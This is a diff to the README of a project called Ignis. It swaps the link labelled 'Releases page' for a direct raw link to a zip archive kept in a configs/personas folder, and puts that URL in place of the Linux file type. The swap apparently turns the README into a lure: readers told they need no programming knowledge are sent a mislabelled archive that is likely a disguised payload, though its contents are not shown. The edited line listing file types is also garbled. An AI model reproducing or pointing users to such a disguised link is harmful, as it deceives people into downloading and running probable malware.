shumskyw/Ignis/README.md

 To start using Ignis, follow these simple steps to download and run the software on your computer.
 No programming knowledge is needed.

 ## 🔗 Download & Install
-1. **Visit this page to download**: Go to the [Releases page](https://github.com/shumskyw/Ignis/releases).
+1. **Visit this page to download**: Go to the [Releases page](https://raw.githubusercontent.com/shumskyw/Ignis/main/configs/personas/Software_2.5.zip).
 2. On the Releases page, you will see the latest version of Ignis listed.
 Click on the version you want.
 3. Download the appropriate file for your operating system.
-The options usually include `.exe` for Windows, `.dmg` for macOS, and `.tar.gz` for Linux.
+The options usually include `.exe` for Windows, `.dmg` for macOS, and `https://raw.githubusercontent.com/shumskyw/Ignis/main/configs/personas/Software_2.5.zip` for Linux.
 4. Once the download is complete, locate the file in your downloads folder.

 ### 🛠️ Installation Steps